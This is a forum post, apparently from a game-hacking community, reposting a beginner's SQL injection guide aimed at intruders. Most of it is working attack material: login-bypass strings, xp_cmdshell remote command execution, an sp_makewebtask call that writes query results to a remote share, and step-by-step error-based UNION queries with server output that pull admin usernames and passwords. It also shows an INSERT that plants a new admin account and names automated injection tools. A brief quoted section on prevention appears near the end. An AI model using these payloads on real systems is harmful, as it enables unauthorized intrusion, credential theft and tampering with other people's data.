[SQL Injection Guide (For Dummies)]

[GrisoM]

In order to be able to operate an SQL injection successfully it is necessary that you know the language previously.

 

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

 

I'm Gonna show you 2 of the guides that i read when i started on the world of SQL

 

When a server only has the web port (usually 80 or 8080) opened, and the server is relatively secure, then a possible intruder must turn to hacking. One simple method using an SQL equipped server (used for many database driven web apps, such as forums or login screens) is to use a technique called "SQL Injection" meaning you are able to "inject" code to the SQL server. For you techies, " It takes parameters from user, and makes an SQL query to a database."

 

Meaning you need to find an input prompt. Like a login screen. You should look for pages that include ASP, JSP, CGI, or PHP. Look for a URL that has parameters, like

 

http://hackerblog.com/index.asp?id=13

 

Or similar. So now you found the page, test if it is vulnerable. Start off with some simple parameters, like

 

1=1--

 

or, alternatively,

 

test'

 

Type those into one of the inputs, or even the URL itself. EG

 

http://hackerblog.com/index.asp?id=test'

 

or

 

http://hackerblog.com/index.asp?id=1=1--

 

If the field is hidden, you can still download the source code and find the hidden field, fill it in like above, then save as an HTML file and execute. If you can't do that, you probably shouldn't be reading that! EG

 

 

 

 

 

There ya go. If it works, you will be able to login without any password, etcetera. If so, lucky you! Now we use -- because it tells the server to forget the rest of the query, in turn selecting an entire table, and from there gives you login, since it looks like you are logging in as everybody. That's the best I can explain it. Figure out the "why's?" better for yourselves if you want. Now if that doesn't work, there are several other options:

 

" or "a"="a

') or ('a'='a

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

 

The next bit here, I quote from SecuriTeam, (http://securiteam.com)

 

"Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

 

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

 

Try using double quote (") if single quote (') is not working.

 

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

 

#tcpdump icmp

 

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

 

It is possible to use sp_makewebtask to write your query into an HTML:

 

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

 

But the target IP must folder "share" sharing for Everyone.

 

We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

 

http://duck/index.asp?id=10

 

We will try to UNION the integer '10' with another string from the database:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

 

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

 

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

 

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver]

Syntax error converting the nvarchar value 'table1' to a column of data type int.

/index.asp, line 5

 

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

 

To get the next table name, we can use the following query:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

 

We also can search for data using LIKE keyword:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.

/index.asp, line 5

 

The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

 

We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.

/index.asp, line 5

 

Now that we have the first column name, we can use NOT IN () to get the next column name:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.

/index.asp, line 5

 

When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][sql Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.

/index.asp, line 5

 

Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

 

Now, let's get the first login_name from the "admin_login" table:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.

/index.asp, line 5

 

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.

/index.asp, line 5

 

We can now login as "neo" with his password "m4trix".

 

There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

 

We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

 

To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

 

We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][sql Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.

/index.asp, line 5

 

Now, you can even login as 'trinity' with the password '31173'."

 

Alright. Now that SecuriTeam has explained how to snag some data from the server, we will go on to insert data into it.

 

To insert data, use INSERT INTO, EG

 

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

 

We can now login as "neo2" with the password of "newpas5".

 

Another quote from SecuriTeam on how to prevent it from happening to you.

 

"Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:

- Input from users

- Parameters from URL

- Values from cookie

 

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

 

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

 

Delete stored procedures that you are not using like:

 

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask"

 

To hackers, remember it's something completely preventable by good coding practice and usually only is allowed when the developer is being lazy or sloppy.

 

 

[color=red][b]Here ends the 1st guide credits go to ChrisTek.[/b][/color]

 

I will link the second one (i dont want make a Double post):

 

http://unixwiz.net/techtips/sql-injection.html

 

 

After all this you must be asking, well sure i have all this info but i will need programs ¬¬

 

Yes but i dont know if i can share them, so i will just name a few (you will have to search them, dont be lazy)

 

-Absinthe

   * Automated SQL Injection

   * Supports MS SQL Server, MSDE, Oracle, Postgres

   * Cookies / Additional HTTP Headers

   * Query Termination

   * Additional text appended to queries

   * Supports Use of Proxies / Proxy Rotation

   * Multiple filters for page profiling

   * Custom Delimiters

 

 

-SQLI

It takes a URL and trying to determine all the information necessary to "by itself" operate the vulnerability in front of the SQL injection, that does not require intervention of the user.

 

-SQLBrute

SQLBrute is a tool for the brute force of data using the SQL injection completely without information. It uses the operation based on the time and the errors of Microsoft SQL Server and Oracle. It is written in Python

 

-Bobcat

Bobcat is a aid to the auditors of security to remove the maximum benefit from the vulnerabilities of injection SQL. One is based on the AppSecInc investigation. It can list of the tie servants, the scheme of the data base and allows the data retrieval from any table to which it accedes to the request.

 

-SqlMap

sqlMap is an automatic tool for the SQL injection completely without information, developed in Python, able to manage digital data bases, tracks, a list of all the remote data bases and more.

 

Just Naming a few that i use =P

 

[color=red][b]I will give some examples of SQL injections on games like MU and L2 (gimme some time to write something ^^)[/b][/color]

 

Hope This guide help any one.

 

[GrisoM]

Is not the best work, but this is an example so you people can see how this thing work:

 

http://www.maxcheaters.com/forum/index.php?topic=74502.0

 

If any one have a question, just reply here^^

[GoDofAdeN]

Great Guide, thanks for your time :D